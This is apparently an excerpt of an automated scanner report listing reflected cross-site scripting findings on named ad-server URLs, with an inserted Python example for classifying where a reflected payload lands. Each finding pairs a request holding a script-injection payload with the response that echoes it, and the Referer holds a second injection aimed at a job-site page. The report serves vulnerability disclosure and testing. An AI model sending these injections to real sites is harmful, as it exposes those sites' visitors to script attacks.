Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH999f7"><script>alert(1)</script>20cb6235d4e;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...

2.55. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d20"><script>alert(1)</script>056827e3655 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&69d20"><script>alert(1)</script>056827e3655=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&69d20"><script>alert(1)</script>056827e3655=1;adiframe=y">
...[SNIP]...

2.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4831c><script>alert(1)</script>dcd50598372 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=4831c><script>alert(1)</script>dcd50598372 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=4831c><script>alert(1)</script>dcd50598372><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CAD
...[SNIP]...

2.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede1a"><script>alert(1)</script>a305855cafa was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]ede1a"><script>alert(1)</script>a305855cafa HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]ede1a"><script>alert(1)</script>a305855cafa;adiframe=y">
...[SNIP]...

2.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5684d"><script>alert(1)</script>3285b7241f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH5684d"><script>alert(1)</script>3285b7241f3;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH5684d"><script>alert(1)</script>3285b7241f3;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...

2.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd61c"><script>alert(1)</script>6e12a239d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&bd61c"><script>alert(1)</script>6e12a239d5=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 296

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&bd61c"><script>alert(1)</script>6e12a239d5=1;adiframe=y">
...[SNIP]...

2.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 68f0e><script>alert(1)</script>1c8ca3d61d3 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=68f0e><script>alert(1)</script>1c8ca3d61d3 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=68f0e><script>alert(1)</script>1c8ca3d61d3><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CAD
...[SNIP]...

2.61. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>367d4ee1dd was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]8b32d"><script>alert(1)</script>367d4ee1dd HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]8b32d"><script>alert(1)</script>367d4ee1dd;adiframe=y">
...[SNIP]...

2.62. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5747e"><script>alert(1)</script>99dd4217e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH5747e"><script>alert(1)</script>99dd4217e0;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH5747e"><script>alert(1)</script>99dd4217e0;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...

2.63. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 719d3"><script>alert(1)</script>50f3b928662 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&719d3"><script>alert(1)</script>50f3b928662=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&719d3"><script>alert(1)</script>50f3b928662=1;adiframe=y">
...[SNIP]...

2.64. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22e4"><script>alert(1)</script>e1024253c05 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]d22e4"><script>alert(1)</script>e1024253c05 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]d22e4"><script>alert(1)</script>e1024253c05;adiframe=y">
...[SNIP]...

2.65. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a3ae0><script>alert(1)</script>ce43ade6607 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=a3ae0><script>alert(1)</script>ce43ade6607 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=a3ae0><script>alert(1)</script>ce43ade6607><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CAD
...[SNIP]...

2.66. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40453"><script>alert(1)</script>7fbb26c9a98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH40453"><script>alert(1)</script>7fbb26c9a98;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH40453"><script>alert(1)</script>7fbb26c9a98;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...
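The two findings above differ only in where the echo lands: in 2.65 the payload sits in the unquoted target attribute of the <base> tag, so a bare > ends the tag, while in 2.66 it sits inside the double-quoted src attribute of the <script> tag and must first supply a closing ". The following Python is an added example, not part of this report or of the ad server's code: it walks a response body up to the echoed payload with a small HTML tokenizer and returns that context, which is how one re-checks a finding before filing it. The two sample bodies are the visible prefixes of the responses shown above, cut where the report shows [SNIP]; the function and field names are this example's own.

```python
# Added example (not from the scanner report or the ad server): classify the
# HTML context in which a reflected payload lands. The sample bodies are the
# visible response prefixes from findings 2.65 and 2.66, cut where the report
# shows "[SNIP]"; function and field names are this example's own.

# Constructed samples: visible prefixes of the two responses.
RESP_UNQUOTED = (
    '<html><body><base target=a3ae0><script>alert(1)</script>ce43ade6607>'
    '<script language="JavaScript" type="text/javascript" '
    'src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CAD'
)
RESP_QUOTED = (
    '<html><body><base target=_blank><script language="JavaScript" '
    'type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1'
    '%7C1403971%7C0%7C154%7CADTECH40453"><script>alert(1)</script>7fbb26c9a98'
    ';target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">'
)
PAYLOAD_UNQUOTED = 'a3ae0><script>alert(1)</script>ce43ade6607'
PAYLOAD_QUOTED = '40453"><script>alert(1)</script>7fbb26c9a98'

QUOTE_OF = {"dq": '"', "sq": "'", "unquoted": ""}


def reflection_context(body: str, payload: str) -> dict:
    """Find the first verbatim echo of `payload` in `body` and report where it sits.

    Returns {"echoed": False} if the payload is absent (e.g. it was encoded).
    Otherwise "context" is "text", "script", "tag" or "attribute", and
    "breakout" is the shortest sequence an injected value needs in order to
    escape that context; for an attribute the tag, name and quote are added.
    """
    idx = body.find(payload)
    if idx < 0:
        return {"echoed": False}

    def after_tag(tag):  # raw-text state inside <script>, ordinary text elsewhere
        return "script" if tag.lower() == "script" else "text"

    state, tag, attr = "text", "", ""
    for i in range(idx):  # minimal HTML tokenizer, spec states loosely followed
        c = body[i]
        if state == "text":
            if c == "<":
                state, tag, attr = "tag_open", "", ""
        elif state == "script":
            if body.startswith("</script", i):
                state, tag, attr = "tag_open", "", ""
        elif state == "tag_open":
            if c == ">":
                state = after_tag(tag)
            elif c.isspace():
                state = "in_tag"
            else:
                tag += c
        elif state == "in_tag":
            if c == ">":
                state = after_tag(tag)
            elif c == "=":
                state = "before_value"
            elif not c.isspace() and c != "/":
                state, attr = "attr_name", c
        elif state == "attr_name":
            if c == "=":
                state = "before_value"
            elif c == ">":
                state = after_tag(tag)
            elif c.isspace():
                state = "in_tag"
            else:
                attr += c
        elif state == "before_value":
            if c == '"':
                state = "dq"
            elif c == "'":
                state = "sq"
            elif c == ">":
                state = after_tag(tag)
            elif not c.isspace():
                state = "unquoted"
        elif state in ("dq", "sq"):
            if c == QUOTE_OF[state]:
                state = "in_tag"
        elif state == "unquoted":
            if c == ">":
                state = after_tag(tag)
            elif c.isspace():
                state = "in_tag"

    if state == "before_value" and payload[:1] not in ('"', "'"):
        state = "unquoted"  # the echoed value itself begins the attribute value
    if state in QUOTE_OF:
        q = QUOTE_OF[state]
        return {"echoed": True, "context": "attribute", "tag": tag.lower(),
                "attr": attr.lower(), "quote": q, "breakout": q + ">"}
    ctx = state if state in ("text", "script") else "tag"
    return {"echoed": True, "context": ctx,
            "breakout": {"text": "", "script": "</script", "tag": ">"}[ctx]}


def breaks_out(ctx: dict, payload: str) -> bool:
    """True if `payload` carries the sequence needed to leave the context in `ctx`."""
    return bool(ctx.get("echoed")) and ctx["breakout"] in payload
```

breaks_out shows why the scanner uses a different marker per context: the 2.65 payload carries no quote, so it would be harmless if echoed into the src attribute of 2.66, while either payload ends the unquoted <base target=...> tag because both contain a bare >.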

2.67. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 669cd"><script>alert(1)</script>17dfe9ed23c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&669cd"><script>alert(1)</script>17dfe9ed23c=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&669cd"><script>alert(1)</script>17dfe9ed23c=1;adiframe=y">
...[SNIP]...

2.68. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 23a02><script>alert(1)</script>84b2b0ffe6a was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=23a02><script>alert(1)</script>84b2b0ffe6a HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
